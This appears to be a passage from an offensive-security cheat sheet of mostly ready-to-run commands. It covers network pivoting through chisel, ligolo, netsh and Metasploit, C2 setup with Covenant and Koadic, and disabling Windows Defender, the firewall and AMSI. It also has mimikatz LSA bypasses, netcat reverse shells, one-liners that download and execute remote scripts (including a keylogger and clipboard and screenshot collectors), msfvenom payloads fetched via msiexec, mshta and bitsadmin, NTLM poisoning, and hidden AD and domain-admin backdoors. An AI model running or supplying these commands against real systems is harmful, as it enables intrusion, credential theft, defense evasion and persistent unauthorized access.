## Get the certificate fingerprint to verify it:  
openssl x509 -in cert.pem -noout -sha1 -fingerprint | cut -d "=" -f 2 | tr -d ":"  
## Start the handler  
python ReverseSocksProxyHandler.py 443 1080 ./cert.pem ./private.key  
```
On the local host:  
```
Import-Module .\Invoke-SocksProxy.psm1  
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130   
## Go through the system proxy:  
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -useSystemProxy  
## Validate certificate  
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -certFingerprint '93061FDB30D69A435ACF96430744C5CC5473D44E'  
## Give up after a number of failed connections to the handler:  
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -maxRetries 10  
```
## netsh
Windows port forwarding - A->B  
```
netsh interface ipv4 install  
netsh interface ipv6 install  
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport  
//listenaddress – is a local IP address waiting for a connection. # The listener address needs to be the IP of an interface of your machine.  
//listenport – local listening TCP port (the connection is waited on it).  
//connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.  
//connectport – is a TCP port to which the connection from listenport is forwarded to.  
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=1234 connectaddress=127.0.0.1 connectport=3389   
  
netsh interface portproxy add v4tov4 listenport=30080 connectport=30080 connectaddress=10.10.14.2  
netsh interface portproxy add v4tov4 listenport=38888 connectport=38888 connectaddress=10.10.14.2  
netsh interface portproxy add v4tov4 listenport=39999 connectport=39999 connectaddress=10.10.14.2  
netsh interface portproxy delete v4tov4 listenport=38888 listenaddress=172.16.1.5  
netsh interface portproxy show all  
```
## Metasploit autoroute  
```
meterpreter > background                                                                                                                                                                                                                     
[*] Backgrounding session 1...                                                                                                                                                                                                               
msf6 exploit(multi/handler) > use multi/manage/autoroute                                                                                                                                                                                     
msf6 post(multi/manage/autoroute) > set session 1                                                                                                                                                                                            
session => 1                                                                                                                                                                                                                                 
msf6 post(multi/manage/autoroute) > exploit                                                                                                                                                                                                  
                                                                                                                                                                                                                                             
[!] SESSION may not be compatible with this module.                                                                                                                                                                                          
[*] Running module against CLIENT09                                                                                                                                                                                                          
[*] Searching for subnets to autoroute.                                                                                                                                                                                                      
[+] Route added to subnet 172.16.126.0/255.255.255.0 from host's routing table.                                                                                                                                                              
[*] Post module execution completed  
  
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy  
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1                                                                                                                                                                                   
SRVHOST => 127.0.0.1  
msf6 auxiliary(server/socks_proxy) > show options                                                                                                                                                                                            
                                                                                                                                                                                                                                             
Module options (auxiliary/server/socks_proxy):                                                                                                                                                                                               
                                                                                                                                                                                                                                             
   Name      Current Setting  Required  Description                                                                                                                                                                                          
   ----      ---------------  --------  -----------                                                                                                                                                                                          
   PASSWORD                   no        Proxy password for SOCKS5 listener                                                                                                                                                                   
   SRVHOST   127.0.0.1        yes       The address to listen on                                                                                                                                                                             
   SRVPORT   1080             yes       The port to listen on                                                                                                                                                                                
   USERNAME                   no        Proxy username for SOCKS5 listener                                                                                                                                                                   
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)                                                                                                                                                           
                                                                                                                                                                                                                                           
Auxiliary action:                                                                                                                                                                                                                            
                                                                                                                                                                                                                                             
   Name   Description                                                                                                                                                                                                                        
   ----   -----------                                                                                                                                                                                                                        
   Proxy  Run a SOCKS proxy server                                                                                                                                                                                                           
                                                                                                                                                                                                                  
msf6 auxiliary(server/socks_proxy) > exploit -j                                                                                                                                                                                              
[*] Auxiliary module running as background job 1.  
```
`proxychains4 nmap internal`  

## Port forwarding in meterpreter shell
Adding port forwards with metasploit module  
`meterpreter > portfwd add -l 80 -r 192.168.1.6 -p 80`  

## Socks Over RDP / Socks Over Citrix
https://github.com/nccgroup/SocksOverRDP
regsvr32.exe SocksOverRDP-Plugin.dll
`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Default\AddIns\SocksOverRDP-Plugin`

## Chisel 
### Basic port forwarding  
attacker ip: 10.10.14.2  
pivot ip: 10.10.10.2  
target ip: 10.10.10.240  
  
on attacker:   
`chisel server -p 8000 --reverse -v`  
  
on pivot:   
Listen on Kali 80, forward to localhost port 80 on pivot  
`chisel client 10.10.14.2:8000 R:127.0.0.1:80:127.0.0.1:80`  

Listen on Kali 80, forward to 10.10.10.240 port 80  
`chisel client 10.10.14.2:8000 R:127.0.0.1:80:10.10.10.240:80`  
  
### Reverse Socks Proxy 
on attacker:  
`chisel server -p 8000 --socks5 --reverse -v`  

on pivot:   
Create SOCKS5 listener on 1080 on Kali, proxy through client  
`chisel client 10.10.14.2:8000 R:socks`   
add "socks5  127.0.0.1 1080" in proxychians config  

on attacker:  
`chisel server -p 8001 --socks5 --reverse -v`  
on pivot:   
`chisel client 10.10.14.2:8001 R:1081:socks`  
add "socks5  127.0.0.1 1081" in proxychians config  
  
`proxychains4 -f ~/new.conf [commands]`  
  
### multiple hops   
A -> B -> C -> D -> E  
#### On A (10.10.14.2)  
```bash
ssh -fNT -D 19050 -i id_rsa root@10.10.110.123  
hop1.conf: socks5  127.0.0.1   19050  
proxychains4 -f hop1.conf xfreerdp /u:'imaginarybit' /p:'P@ssw0rd12345!' /v:172.16.1.5  
  
chisel server -p 8000 --socks5 --reverse -v  
hop2.conf: socks5  127.0.0.1   1080;  
proxychains4 -f hop2.conf xfreerdp /u:'imaginarybit' /p:'P@ssw0rd12345!' /v:172.16.6.12  
  
python -m SimpleHTTPServer 10080  
nc -lvnp 28888  
nc -lvnp 38888  
  
hop3.conf: socks5  127.0.0.1   19050;socks5  172.16.1.5  18888  
hop3.conf: socks5  127.0.0.1   1080;socks5  127.0.0.1   1080  
proxychains4 -f hop3.conf xfreerdp /u:'imaginarybit' /p:'P@ssw0rd12345!' /v:172.16.2.102  
```
#### On B (10.10.110.123)  
  
#### On C (172.16.1.5)  
```
chisel.exe client 10.10.14.2:8000 R:socks  
netsh interface portproxy add v4tov4 listenport=10080 connectport=10080 connectaddress=10.10.14.2  
netsh interface portproxy add v4tov4 listenport=28888 connectport=28888 connectaddress=10.10.14.2  
netsh interface portproxy add v4tov4 listenport=38888 connectport=38888 connectaddress=10.10.14.2  
netsh interface portproxy add v4tov4 listenport=48888 connectport=48888 connectaddress=10.10.14.2  
netsh interface portproxy add v4tov4 listenport=58888 connectport=58888 connectaddress=10.10.14.2  
  
chisel.exe server -p 8000 --socks5 --reverse -v  
netsh interface portproxy add v4tov4 listenport=18888 connectport=1080 connectaddress=127.0.0.1  
```
#### On D (172.16.2.12)  
```
nc 172.16.1.5 28888 -e cmd.exe    # standard user shell  
nc 172.16.1.5 38888 -e cmd.exe    # admin user shell  
netsh interface portproxy add v4tov4 listenport=10080 connectport=10080 connectaddress=172.16.1.5  
netsh interface portproxy add v4tov4 listenport=48888 connectport=48888 connectaddress=172.16.1.5  
netsh interface portproxy add v4tov4 listenport=58888 connectport=58888 connectaddress=172.16.1.5  
  
chisel.exe client 172.16.1.5:8000 R:socks  
```
#### On E (172.16.2.102)  
```
nc 172.16.2.12 48888 -e cmd.exe    # standard user shell  
nc 172.16.2.12 58888 -e cmd.exe    # admin user shell  
```

## Ligolo-ng - userland network stack
https://github.com/tnpitsecurity/ligolo-ng

###Linux
```
//on c2
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

//on agent
$ ./agent -connect attacker_c2_server.com:11601
[Agent : nchatelain@nworkstation] » ifconfig 

//on c2
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

$ sudo ip route add 192.168.0.0/24 dev ligolo
```

###Windows
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
```
//on c2
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

> netsh int ipv4 show interfaces
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation   
```

###Agent Binding/Listening
```
[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!    
[Agent : nchatelain@nworkstation] » listener_list 
[Agent : nchatelain@nworkstation] » listener_stop 0
//on c2
$ nc -lvp 4321
```

####################################################################################################  
####################################     Command and Control    ####################################  
####################################################################################################  
  
## covenant  
```
$ ~ > cd Covenant/Covenant  
$ ~/Covenant/Covenant > dotnet build  
$ ~/Covenant/Covenant > dotnet run  
```
## covenant docker  
sudo docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v /opt/Covenant/Covenant/Data:/app/Data covenant  
sudo docker ps -l  
sudo docker exec -it [container]  
sudo docker start [container]  
  
## inject Donut Shellcode  
./donut.exe -a2 -f1 "C:\Users\User\Desktop\API.exe" -o API.bin    //-a <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default). -f <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex  
./donut.exe -a2 -f1 "C:\Users\User\Desktop\APIx86.exe" -o APIx86.bin  
$filename64 = "C:\Users\User\Desktop\API.bin"  
[convert]::ToBase64String([IO.File]::ReadAllBytes($filename64)) | clip  
$filename86 = "C:\Users\User\Desktop\APIx86.bin"  
[convert]::ToBase64String([IO.File]::ReadAllBytes($filename86)) | clip  
  
## generate new payload  
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319   
.\csc.exe -platform:x86 -out:"C:\Users\User\Desktop\covenant86.exe" "C:\Users\User\Desktop\covenant32bit.cs"  
.\csc.exe -platform:x64 -out:"C:\Users\User\Desktop\covenant64.exe" "C:\Users\User\Desktop\covenant64bit.cs"  
  
## rastamouse GruntInjector script - https://gist.github.com/rasta-mouse/3f73f1787e6ab1ceead636ca632a50bf#file-gistfile1-txt  
C:\Users\user1\Desktop>GruntInjector.exe "C:\Program Files\Internet Explorer\iexplore.exe" 4084  
  
## koadic - windows post-exploitation C2 framework  
git clone https://github.com/zerosum0x0/koadic.git  
cd koadic  
pip3 install -r requirements.txt  
./koadic  
  
stager/js/mshta	      # serves payloads in memory using MSHTA.exe HTML Applications  
stager/js/regsvr     	# serves payloads in memory using regsvr32.exe COM+ scriptlets  
stager/js/rundll32_js	# serves payloads in memory using rundll32.exe  
stager/js/disk	      # serves payloads using files on disk  
stager/js/wmic	      # serves payloads in memory using WMIC  
stager/js/bitsadmin	  # transfers a .wsf payload containing JScript over a Bitsadmin job and executes it  
  
####################################################################################################  
##################################     Bypass Local Protection    ##################################  
####################################################################################################  
  
## Bypass UAC and launch PowerShell window as admin  
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"  
  
## check applocker rules  
PS C:\> $a = Get-ApplockerPolicy -effective  
PS C:\> $a.rulecollections  
  
## PS constrained  
PS C:\> $ExecutionContext.SessionState.LanguageMode  
  
## disable windows defender  
& "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  
(Get-MpPreference).DisableRealtimeMonitoring  
(Get-MpPreference).DisableIOAVProtection  

Set-MpPreference -DisableRealtimeMonitoring $true  
Set-MpPreference -DisableIOAVProtection $true  

```
PS C:\htb> Get-MpComputerStatus | findstr "True"
AMServiceEnabled                : True
AntispywareEnabled              : True
AntivirusEnabled                : True
BehaviorMonitorEnabled          : True
IoavProtectionEnabled           : True
IsTamperProtected               : True
NISEnabled                      : True
OnAccessProtectionEnabled       : True
RealTimeProtectionEnabled       : True
```

## bypass defender and execute procdump.exe
rename procdump.exe to dump64.exe and place it to
`C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe`
  
## disable firewall  
netsh firewall set opmode disable  
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False  
  
## https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a  
## LSA Protection Bypass:  
Get-Item -Path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa | Select-Object -ExpandProperty Property  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -> RunAsPPL -> 1    # check reg if protected LSA is enabled, it run LSASS as a protected process  
download whole zip contains mimikatz.exe, mimidrv.sys, and mimilib.dll  
mimikatz > version  
mimikatz > !+  
mimikatz > !processprotect /process:lsass.exe /remove  
  
## Credential Guard Bypass  
.\DG_Readiness_Tool_v3.2.ps1 -Enable -AutoReboot    # If it is enabled, instead of the NTLM hash, Credential Guard returns an encrypted string.  
download whole zip contains mimikatz.exe, mimidrv.sys, and mimilib.dll  
mimikatz > version  
mimikatz > misc::memssp    # mimikatz start to log the passwords of all users who login to c:\windows\system32\mimilsa.log  
type c:\windows\system32\mimilsa.log  
  
## https://github.com/mvelazc0/defcon27_csharp_workshop  
#1 Custom Meterpreter Stager  
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=Your_Kali_IP LPORT=8080 -f exe > ~/reverse.exe  
openssl genrsa > privkey.pem  
openssl req -new -x509 -key privkey.pem -out cert.pem -days 365  
twistd -n web -c cert.pem -k privkey.pem --https=8080  
run reverse.exe and get the staging URL  
query staging URL using web.client  
put the downloaded payload data into memory using win32 API  
1. VirtualAlloc  
2. Marshal.Copy  
3. CreateThread  
  
#23 Shellcode Obfuscation (cannot bypass windows defender)  
XORing Your Payload  
AESing Your Payload  
  
#45 PowerShell without PowerShell.exe (cannot bypass amsi)  
Executing PWS Cmdlets  
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Program Files(x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll" 1.cs  
  
#6 DLL Injection (将dll注入到一个已存在的进程中)  
gcc -m64 -shared -o ShellcodeInjectionDll.dll ShellcodeInjectionDll\ShellcodeInjectionDll.cpp  
  
VirtualAlloc function is used to reserve, commit, or change the state of a region of pages in the virtual address space of the calling process.  
VirtualAllocEx function is to allocate memory in another process' address space.  
WaitForSingleObject function is used to wait until the specified object is in the signaled state or the time-out interval elapses.(avoid shell terminated while connecting)  
  
Get the process id of the target process (e.g. with something like GetWindowThreadProcessId). # Process proc1 = Process.GetProcessById(val);  
Get a handle to the process with the appropriate permissions using OpenProcess. # IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, proc1.Id);  
Allocate some memory in that process with VirtualAllocEx. # IntPtr memAddr = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllPath.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);  
Copy the name of your DLL into that memory with WriteProcessMemory. # bool resp1 = WriteProcessMemory(procHandle, memAddr, Encoding.Default.GetBytes(dllPath), (uint)((dllPath.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);  
Get the address of the LoadLibrary function using GetProcAddress. # IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");  
Call CreateRemoteThread to start the LoadLibrary call in the target process, with the thread parameter being the memory you've allocated with VirtualAllocEx (containing the name of the DLL). # CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, memAddr, 0, IntPtr.Zero);  
  
#7 Process Hollowing (启动一个进程,然后向该进程注入shellcode)  
using CreateProcess Windows32 API  
  
#8 Parent Process Spoofing  
spawn a new process spoofing its parent process and inject shellcode to it to obtain a reverse shell.  
  
## amsi disable - https://amsi.fail/  
Using PowerShell version 2  
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)  
  
## amsi Patching - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell  
Patching amsi.dll AmsiScanBuffer by rasta-mouse  
Amsi ScanBuffer Patch  
Amsi Buffer Patch - In memory  
Adam Chester Patch  
Modified Amsi ScanBuffer Patch  
  
## Bypass Application Whitelisting (AppLocker) -   
Applocker apply rules based on 1.Publisher or 2.Path or 3.File hash  
sfk replace cmd.exe -binary /440069007300610062006c00650043004D004400/440069007300610062006c00650041004D004400/     # customized cmd.exe  
  
## Writable Folders for Bypassing Execution Control  
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys  
C:\Windows\System32\spool\drivers\color  
C:\Windows\Tasks  
C:\windows\tracing  
  
## Code Execution Techniques - https://github.com/pwndizzle/CodeExecutionOnWindows  
accesschk64.exe "Users" c:/Windows -w                            # find out writable path  
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe payload.cs # craft payload.exe  
msfvenom -p windows/x64/meterpreter/reverse_https -f payload.dll # craft payload.dll, or .vbs or .xml  
  
C:\Windows\System32\SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" # SyncAppvPublishingServer.exe, alternative to Powershell.exe  
C:\Windows\System32\control.exe payload.dll                                                     # control.exe  
C:\Windows\System32\cscript.exe payload.vbs (where payload.vbs contains WScript.Shell)          # cscript.exe/wscript.exe  
C:\Windows\System32\cscript.exe payload.js (where payload.js contains WScript.Shell)            # cscript.exe/wscript.exe  
C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll      # rundll32.exe  
C:\Windows\System32\rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";alert('test');      # rundll32.exe  
C:\Windows\System32\regsvr32.exe /s /n /u /i:[URL] scrobj.dll                                   # regsvr32.exe  
C:\Windows\System32\regsvr32.exe payload.dll                                                    # regsvr32.exe  
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj                           # MSBuild.exe  
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml                              # MSBuild.exe  
C:\Windows\System32\mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta                       # mshta.exe  
C:\Windows\System32\wbem\WMIC.exe os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"          # wmic.exe  
winrm.exe qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}                        # winrm.exe  
C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c whoami                # forfiles.exe, alternative to cmd.exe  
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe # InstallUtil.exe  
  
## https://lolbas-project.github.io/#/execute  
AgentExecutor.exe  
Appvlp.exe  
At.exe  
Atbroker.exe  
Bash.exe  
Bginfo.exe  
Bitsadmin.exe  
Cdb.exe  
Cmstp.exe  
coregen.exe  
csi.exe  
DefaultPack.EXE  
Devtoolslauncher.exe  
Diskshadow.exe  
Dnscmd.exe  
dnx.exe  
Dotnet.exe  
Dxcap.exe  
Explorer.exe  
Extexport.exe  
Forfiles.exe  
Ftp.exe  
Gpscript.exe  
Hh.exe  
Ie4uinit.exe  
Ieexec.exe  
Infdefaultinstall.exe  
Installutil.exe  
Mavinject.exe  
Mftrace.exe  
Microsoft.Workflow.Compiler.exe  
Mmc.exe  
Msbuild.exe  
Msconfig.exe  
Msdeploy.exe  
Msdt.exe  
Mshta.exe  
Msiexec.exe  
msxsl.exe  
Netsh.exe  
Odbcconf.exe  
Pcalua.exe  
Pcwrun.exe  
Presentationhost.exe  
Rasautou.exe  
rcsi.exe  
Regasm.exe  
Register-cimprovider.exe  
Regsvcs.exe  
Regsvr32.exe  
Rundll32.exe  
Runonce.exe  
Runscripthelper.exe  
Schtasks.exe  
Scriptrunner.exe  
Sqlps.exe  
SQLToolsPS.exe  
Squirrel.exe  
SyncAppvPublishingServer.exe  
te.exe  
Tracker.exe  
Ttdinject.exe  
Tttracer.exe  
Update.exe  
Verclsid.exe  
vsjitdebugger.exe  
Wab.exe  
Wmic.exe  
Wsl.exe  
wuauclt.exe  
Xwizard.exe  
  
## msiexec.exe  
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 –f msi > shell.msi  
msiexec.exe /q /i http://192.168.1.107/shell.msi  
or  
msfvenom -p windows/exec CMD=cmd.exe -f msi > cmd.msi  
mv cmd.msi cmd.png  
msiexec.exe /q /i http://192.168.1.107/cmd.png  
or  
msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi  
msiexec.exe /q /i http://192.168.1.107/admin.msi  
or  
msiexec /y payload.dll  
msiexec /z payload.dll  
  
## GreatSCT  
GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.  
https://github.com/GreatSCT/GreatSCT  
installe and follow instruction to generate payload  
source code file: payload.xml  
metasploit rc file: payload.rc  
on victim: cmd.exe /c c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe payload.xml  
on attack: msfconsole -r payload.rc  
  
## cmstp.exe  
## prepare payload launcher.sct  
usestager windows/launcher_sct  
set Listener HTTP  
execute  
## content of shell.inf  
;cmstp.exe /s cmstp.inf  
  
[version]  
Signature=$chicago$  
AdvancedINF=2.5  
  
[DefaultInstall_SingleUser]  
UnRegisterOCXs=UnRegisterOCXSection  
  
[UnRegisterOCXSection]  
%11%\scrobj.dll,NI,http://10.10.14.5:8888/launcher.sct  
  
[Strings]  
AppAct = "SOFTWARE\Microsoft\Connection Manager"  
ServiceName="Yay"  
ShortSvcName="Yay"  
## execute on victim  
cmstp.exe /s shell.inf  
  
## Use cscript.exe/wscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).  
cscript c:\ads\file.txt:script.vbs  
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js  
  
## mshta.exe  
Description: MSHTA can be used to execute HTA files (containing scripts) or directly execute VBScript/JScript from the command line.  
Example: C:\Windows\System32\mshta.exe bad.hta  
Example: mshta vbscript:Execute("MsgBox(""amessage"",64,""atitle"")(window.close)")  
Example: mshta javascript:alert('test');  
Example HTA:   
<html><HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /><script language="VBScript">  
Set objShell = CreateObject("Wscript.Shell")  
objShell.Run "calc.exe"  
Close  
</script></html>  
  
## NTLM hash capture  
"c:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\10.10.14.3\test  
vim /etc/responder/Responder.conf and change Challenge = 1122334455667788  
sudo responder -I tun0  
sudo responder -I tun0 --lm  
crack.sh  
  
####################################################################################################  
#####################################     Man-In-The-Middle    #####################################  
####################################################################################################  
  
## Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.  
### Start inveigh using Basic Auth - logging to file  
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y -HTTPAuth Basic"  
  
### Start inveigh in silent mode (no popups)  
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y -WPADAuth anonymous"  
  
## Invoke-HotPotato Exploit  
powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Tater/master/Tater.ps1');invoke-Tater -Command 'net localgroup Administrators user /add'"  
  
## Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.  
https://github.com/lgandx/Responder  
./Responder.py -I eth0 -rPv  
  
####################################################################################################  
#########################################     Persistence    #######################################  
####################################################################################################  
  
## Use Windows Debug api to pause live processes  
powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/Pause-Process/master/pause-process.ps1');Pause-Process -ID 1180;UnPause-Process -ID 1180;"  
  
## Import Powersploits invoke-keystrokes  
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')"  
  
## Import Empire's Get-ClipboardContents  
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1')"  
  
## Import Get-TimedScreenshot  
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-TimedScreenshot')"  
  
## create a schedule task to execute backdoor  
schtasks /creat /ru SYSTEM /sc MINUTE /MO 10 /tn megapwn /tr "\"C:\\Users\\path_to_backdoor\\backdoor.exe\""  
  
## changing password  
net user username newPassword  
net user username newPassword /domain  
  
## create a new user  
net user imaginarybit P@ssw0rd12345! /add  
net localgroup administrators imaginarybit /add  
net localgroup "Remote Desktop Users" imaginarybit /add  
net share nothing$=C:\ /grant:imaginarybit,FULL /unlimited  
net user username /active:yes /domain  
  
## create a new domain user  
net user imaginarybit P@ssw0rd12345! /add /domain /y  
net group "domain admins" imaginarybit /add   
net group "Enterprise Admins" imaginarybit /add  
  
## bitsadmin.exe  
bitsadmin /create hackingarticles  
bitsadmin /addfile hackingarticles http://192.168.1.13/payload.exe C:\payload.exe  
bitsadmin /SetNotifyCmdLine hackingarticles cmd.exe "/c bitsadmin.exe /complete hackingarticles | start /B C:\payload.exe"  
bitsadmin /SetMinRetryDelay hackingarticles 120  
schtasks /create /tn hackingarticles /tr "C:\system32\bitsadmin.exe /resume hackingarticles" /sc minute /mo 60  
schtasks /run /tn hackingarticles  
  
## AD Backdoor  
## Hiding DACL  
1. Change the obejct owner from "Domain Admins" to the attacker account.  
2. Add a new explicit ACE denying the "Everyone" Principal the "Read Permissions" privilege.  
or  
1. Change the object owner to itself or another controlled principal  
2. Grant explicit control of the pricipal to either itself, or another controlled principal.  
3. On the OU containing your hidden pricipal, deny the "List Contents" privilege to "Everyone"  
  
## AdminSDHolder Backdoor  
Attacker grant themselves the "User-Force-Change-Password" or "Generic All" right on "CN=AdminSDHolder,CN=System,DC=Domain"  
Every 60 minutes, this permission is cloned to every sensitive/protected AD object through SDProp process  
Attakcer hides their account using methosd described  
  
$UserSid = Convert-NameToSid badguy  
Add-DomainObjectACL -TargetIdentity "CN=AdminSDHolder,CN=System,DC=CORP,DC=LOCAL" -PrincipalIdentity badguy -Right All  
## Hiding with deny GenericAll  
Set-DomainObjectOwner -Identity badguy -OwnerIdentity badguy  
$User = Get-DomainUser badguy  
$UserOU = $User distinguishedName Substring($User distinguishedName IndexOf("OU=")  
$RawObject = Get-DomainOU -Raw -Identity $UserOU  
$TargetObject = $RawObject GetDirectoryEntry()  
$RawUser = Get-DomainUser -Raw -Identity badguy  
$TargetUser = $RawUser GetDirectoryEntry()  
$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Deny -PrincipalIdentity "S-1-1-0" -Right GenericAll  
$TargetUser.PsBase.ObjectSecurity.AddAccessRule($ACE)  
$TargetUser.PsBase.CommitChanges()  
## Hiding with deny everyone to list the children  
$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Deny -PrincipalIdentity "S-1-1-0" -Right ListChildren  
$TargetUser.PsBase.ObjectSecurity.AddAccessRule($ACE)  
$TargetUser.PsBase.CommitChanges()  
  
## LAPS Backdoor  
$RawObject = Get-DomainOU -Raw Servers  
$TargetObject = $RawObject.GetDirectoryEntry()  
$AdmPwdGuid = (Get-DomainGUIDMap).GetEnumerator() | ?{$_.value eq 'ms-Mcs-AdmPwd'}|select -ExpandProperty name  
$ACE = New-ADObjectAccessControlEntry -InheritanceType Descendents -AccessControlType Allow -PrincipalIdentity "Domain Users" -Right ExtendedRight -ObjectType $AdmPwdGuid  
$TargetUser.PsBase.ObjectSecurity.AddAccessRule($ACE)  
$TargetUser.PsBase.CommitChanges()  
Find-AdmPwdExtendedRights -OrgUnit Servers -IncludeComputers | fl    # Find-AdmPwdExtendedRights "Audits" who can read ms-Mcs-AdmPwd  
Get-DomainComputer FS01 -Properties name,ms-mcs-AdmPwd  

## DLL injection
When an executable program load a DLL, it will search from the $PATH.
For e.g., explorer.exe
c:\windows\system32\cscapi.dll will be loaded and it is not being used by any program
but the c:\windows\ has priority then c:\windows\system32
if malicious c:\windows\cscapi.dll is existed, the dll will be executed

Known DLLs cannot be hijacked (HKML\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs)

DLL proxy. The malicious DLL can forward the function calls to the actual DLL file.
https://www.cobaltstrike.com/blog/create-a-proxy-dll-with-artifact-kit/

####################################################################################################  
#####################################       Core Impacket         ##################################  
####################################################################################################  
  
The STATUS_OBJECT_NAME_NOT_FOUND error should indicate that there is no \PIPE\svcctl pipe in the IPC$ share for some reasons.  
